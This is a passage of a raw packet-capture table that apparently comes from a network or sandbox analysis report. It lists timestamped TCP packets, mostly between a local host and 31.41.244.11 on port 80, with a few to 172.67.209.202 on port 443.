                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618062973 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618073940 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618220091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618237019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618252993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618261099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618272066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618277073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618294954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618314981 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.737962008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.738014936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.738079071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.741828918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.741977930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.742029905 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.810729027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.810750961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.810797930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.814842939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.814973116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.815025091 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.823268890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.825735092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.825753927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.825781107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.825799942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.833951950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.834013939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.834188938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.834188938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.842103004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.842444897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.842492104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.850644112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.850667953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.850716114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.859010935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.859036922 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.859081030 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.867429972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.867501974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.867546082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.874859095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.875008106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.875068903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.882508993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.882597923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.882668972 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.890100002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.890224934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.890292883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.897711992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.897767067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.004683018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.004870892 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.005081892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.005126953 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.007005930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.007023096 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.007046938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.007075071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.011562109 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.011604071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.011682987 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.011728048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.016088009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.016130924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.016366005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.016408920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.020668030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.020714045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.020950079 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.020992041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.025219917 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.025268078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.025414944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.025455952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.029706955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.029751062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.029777050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.029818058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.034198046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.034240961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.034347057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.034389019 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.038676023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.038714886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.038760900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.038814068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.043193102 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.043237925 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.043309927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.043355942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.047724009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.047786951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.047806978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.047849894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.052213907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.052259922 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.052305937 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.052345991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.057023048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.057039976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.057064056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.057086945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.061361074 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.061400890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.061440945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.061456919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.065882921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.065942049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.065957069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.065995932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.070291996 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.070339918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.070384026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.070425034 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.074954033 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.074971914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.074991941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.075006962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.079343081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.079365015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.079427004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.084089994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.084136963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.084168911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.084193945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.088470936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.088527918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.088814020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.088850975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.093127966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.093144894 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.093182087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.093197107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.097348928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.097390890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.097569942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.097609997 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.101933002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.101948977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.101974010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.101990938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.106594086 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.106621027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.106645107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.106664896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.117978096 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.118058920 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.119787931 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.119844913 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.120099068 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.166157961 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.166157961 CET49806443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.166301012 CET44349806172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.197277069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.197326899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.197372913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.197387934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.199124098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.199150085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.199173927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.199186087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.202666044 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.202691078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.202718973 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.202737093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.206217051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.206247091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.206273079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.206304073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.209849119 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.209923029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.210153103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.210222006 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.213326931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.213371038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.213452101 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.213514090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.217217922 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.217243910 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.217287064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.218023062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.220129967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.220199108 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.220282078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.220328093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.223588943 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.223637104 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.223664999 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.223683119 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.226866007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.226891994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.226917028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.226938009 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.230102062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.230128050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.230170965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.230201960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.233032942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.233082056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.233189106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.233236074 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.236038923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.236088991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.236196041 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.236263037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.239126921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.239144087 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.239168882 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.239185095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.242443085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.242470026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.242486954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.242535114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.245136976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.245182037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.245296001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.245338917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.248186111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.248238087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.248279095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.248322010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.251205921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.251250982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.251346111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.251390934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.254513025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.254539967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.254559040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.254574060 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.257540941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.257591963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.257613897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.257628918 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.260715961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.260740995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.260762930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.260776997 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.263546944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.263588905 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.263592958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.263628960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.266716957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.266741991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.266758919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.266776085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.269798994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.269849062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.269870996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.269885063 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.272566080 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.272613049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.272752047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.272798061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.275598049 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.275639057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.275667906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.275706053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.389523983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.389597893 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.389683008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.389729023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.390820980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.390877008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.390991926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.391041994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.393237114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.393287897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.393389940 CET804980431.41.244.11192.168.2.4
